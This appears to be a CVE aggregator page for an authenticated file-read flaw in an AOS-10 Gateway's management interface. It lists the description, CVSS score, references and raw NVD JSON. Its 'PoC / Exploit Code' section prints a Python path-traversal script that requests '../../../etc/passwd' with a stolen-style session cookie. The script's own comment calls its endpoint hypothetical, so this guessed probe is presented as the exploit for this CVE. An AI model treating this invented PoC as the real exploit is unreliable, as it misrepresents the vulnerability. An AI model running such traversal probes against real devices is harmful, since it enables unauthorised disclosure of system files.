CVE-2026-44874

Description

A vulnerability exists in the web-based management interface of an AOS-10 Gateway that could allow an authenticated remote attacker to access sensitive files on the underlying operating system. Successful exploitation of this vulnerability could result in the disclosure of confidential system information, potentially enabling further attacks against the affected device.

CVSS Details

CVSS Score

4.9

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

AOS-10 Gateway (具体受影响版本请参考HPE官方安全公告)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Exploit Title: Authenticated Sensitive File Read in AOS-10 Gateway
# CVE: CVE-2026-44874
# Description: This script demonstrates how an authenticated attacker might read sensitive files.

TARGET_URL = "https://<target-ip>/<management-path>"
SESSION_COOKIE = "<authenticated_session_cookie>"
FILE_PATH = "../../../etc/passwd" # Example sensitive file

headers = {
    "Cookie": f"session={SESSION_COOKIE}",
    "User-Agent": "Mozilla/5.0 (Compatible; CVE-2026-44874-Scanner)"
}

# Hypothetical endpoint vulnerable to path traversal or arbitrary file read
params = {
    "action": "view_log",
    "file": FILE_PATH
}

try:
    response = requests.get(TARGET_URL, headers=headers, params=params, verify=False, timeout=10)
    if response.status_code == 200:
        print("[+] Potential Vulnerability Detected!")
        print("[+] Response Content:")
        print(response.text[:500]) # Print first 500 chars
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-44874
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-44874
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-44874/
[4] VulDB https://vuldb.com/cve/CVE-2026-44874
[5] https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw05048en_us&docLocale=en_US

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-44874", "sourceIdentifier": "[email protected]", "published": "2026-05-12T20:16:46.020", "lastModified": "2026-05-12T20:16:46.020", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability exists in the web-based management interface of an AOS-10 Gateway that could allow an authenticated remote attacker to access sensitive files on the underlying operating system. Successful exploitation of this vulnerability could result in the disclosure of confidential system information, potentially enabling further attacks against the affected device."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw05048en_us&docLocale=en_US", "source": "[email protected]"}]}}